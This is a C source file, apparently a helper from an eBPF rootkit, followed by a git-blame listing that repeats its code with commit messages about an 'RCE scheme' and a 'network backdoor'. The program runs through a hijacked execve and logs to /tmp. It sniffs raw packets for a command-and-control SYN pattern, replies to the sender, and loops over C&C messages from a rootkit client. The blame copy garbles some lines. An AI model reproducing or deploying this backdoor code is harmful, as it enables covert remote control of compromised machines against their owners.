src/helpers/execve_hijack.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <sys/wait.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include "lib/RawTCP.h"
#include "../common/c&c.h"

char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
    struct hostent *host_entry;
    int hostname;
  
    hostname = gethostname(hostbuffer, sizeof(hostbuffer));
    if(hostname==-1){
        exit(1);
    }
  
    host_entry = gethostbyname(hostbuffer);
    if(host_entry == NULL){
        exit(1);
    }
  
    // To convert an Internet network
    // address into ASCII string
    strcpy(IPbuffer,inet_ntoa(*((struct in_addr*) host_entry->h_addr_list[0])));
  
    return IPbuffer;
}

int main(int argc, char* argv[]){
    printf("Hello world from execve hijacker\n");

    time_t rawtime;
    struct tm * timeinfo;

    time ( &rawtime );
    timeinfo = localtime ( &rawtime );
    char* timestr = asctime(timeinfo);

    for(int ii=0; ii<argc; ii++){
        printf("Argument %i is %s\n", ii, argv[ii]);
    }

    //We proceed to fork() and exec the original program, whilst also executing the one we 
    //ordered to execute via the network backdoor
    //int bpf_map_fd = bpf_map_get_fd_by_id()

    int fd = open("/tmp/execve_hijack", O_RDWR | O_CREAT | O_TRUNC, 0666);
    
    int ii = 0;
    while(*(timestr+ii)!='\0'){
        write(fd, timestr+ii, 1);
        ii++;
    }
    write(fd, "\t", 1);
    
    ii = 0;
    while(*(argv[0]+ii)!='\0'){
        write(fd, argv[0]+ii, 1);
        ii++;
    }

    write(fd, "\n", 1);

    close(fd);


    packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);

    //TODO GET THE IP FROM THE BACKDOOR CLIENT
    char* local_ip = getLocalIpAddress();
    char remote_ip[16];
    inet_ntop(AF_INET, &(packet.ipheader->saddr), remote_ip, 16);
    printf("IP: %s\n", local_ip);
    
    packet_t packet_ack = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_ACK);
    if(rawsocket_send(packet_ack)<0){
        return -1;
    }

    //Start of pseudo connection with the rootkit client
    int connection_close = 0;
    while(!connection_close){
        packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG);
        printf("Received client message\n");
        char* payload = packet.payload;
        char *p;
        p = strtok(payload, "#");
        p = strtok(NULL, "#");
        if(p){
            if(strcmp(p, CC_PROT_FIN_PART)==0){
                printf("Connection closed by request\n");
                connection_close = 1;
            }else{
                printf("Received request: %s\n", p);
                packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_MSG);
                if(rawsocket_send(packet_res)<0){
                    return -1;
                }
            }
        }
    }

    return 0;
}
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`#include <stdio.h>`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`#include <stdlib.h>`
			`#include <sys/types.h>`
			`#include <sys/stat.h>`
			`#include <fcntl.h>`
			`#include <unistd.h>`
Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`#include <time.h>`
Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor 2022-02-14 20:08:30 -05:00			`#include <sys/wait.h>`
			`#include <bpf/bpf.h>`
			`#include <bpf/libbpf.h>`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`#include <sys/socket.h>`
			`#include <netinet/in.h>`
			`#include <arpa/inet.h>`
			`#include <sys/socket.h>`
			`#include <netdb.h>`
			`#include <netinet/ip.h>`
			`#include <netinet/tcp.h>`
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`#include "lib/RawTCP.h"`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`#include "../common/c&c.h"`

			`char* getLocalIpAddress(){`
			`char hostbuffer[256];`
			`char* IPbuffer = calloc(256, sizeof(char));`
			`struct hostent *host_entry;`
			`int hostname;`

			`hostname = gethostname(hostbuffer, sizeof(hostbuffer));`
			`if(hostname==-1){`
			`exit(1);`
			`}`

			`host_entry = gethostbyname(hostbuffer);`
			`if(host_entry == NULL){`
			`exit(1);`
			`}`

			`// To convert an Internet network`
			`// address into ASCII string`
			`strcpy(IPbuffer,inet_ntoa(((struct in_addr) host_entry->h_addr_list[0])));`

			`return IPbuffer;`
			`}`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00
Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`int main(int argc, char* argv[]){`
			`printf("Hello world from execve hijacker\n");`
Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00
			`time_t rawtime;`
			`struct tm * timeinfo;`

			`time ( &rawtime );`
			`timeinfo = localtime ( &rawtime );`
			`char* timestr = asctime(timeinfo);`

Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`for(int ii=0; ii<argc; ii++){`
			`printf("Argument %i is %s\n", ii, argv[ii]);`
			`}`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00
Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor 2022-02-14 20:08:30 -05:00			`//We proceed to fork() and exec the original program, whilst also executing the one we`
			`//ordered to execute via the network backdoor`
			`//int bpf_map_fd = bpf_map_get_fd_by_id()`

Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`int fd = open("/tmp/execve_hijack", O_RDWR \| O_CREAT \| O_TRUNC, 0666);`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00
			`int ii = 0;`
Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`while(*(timestr+ii)!='\0'){`
			`write(fd, timestr+ii, 1);`
			`ii++;`
			`}`
			`write(fd, "\t", 1);`

			`ii = 0;`
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done 2022-02-06 14:15:57 -05:00			`while(*(argv[0]+ii)!='\0'){`
			`write(fd, argv[0]+ii, 1);`
			`ii++;`
			`}`

Completed execve hijacking, as with special error cases that arise and that are documented in the code. 2022-02-14 17:45:07 -05:00			`write(fd, "\n", 1);`

			`close(fd);`

Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00
			`packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);`

			`//TODO GET THE IP FROM THE BACKDOOR CLIENT`
			`char* local_ip = getLocalIpAddress();`
			`char remote_ip[16];`
			`inet_ntop(AF_INET, &(packet.ipheader->saddr), remote_ip, 16);`
			`printf("IP: %s\n", local_ip);`

			`packet_t packet_ack = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_ACK);`
			`if(rawsocket_send(packet_ack)<0){`
			`return -1;`
			`}`

			`//Start of pseudo connection with the rootkit client`
			`int connection_close = 0;`
			`while(!connection_close){`
			`packet_t packet = rawsocket_sniff_pattern(CC_PROT_MSG);`
			`printf("Received client message\n");`
			`char* payload = packet.payload;`
			`char *p;`
			`p = strtok(payload, "#");`
			`p = strtok(NULL, "#");`
			`if(p){`
			`if(strcmp(p, CC_PROT_FIN_PART)==0){`
			`printf("Connection closed by request\n");`
			`connection_close = 1;`
			`}else{`
			`printf("Received request: %s\n", p);`
			`packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_MSG);`
			`if(rawsocket_send(packet_res)<0){`
			`return -1;`
			`}`
			`}`
			`}`
			`}`

Added new helper program to be used with the execve hijacking module 2022-02-05 19:00:25 -05:00			`return 0;`
			`}`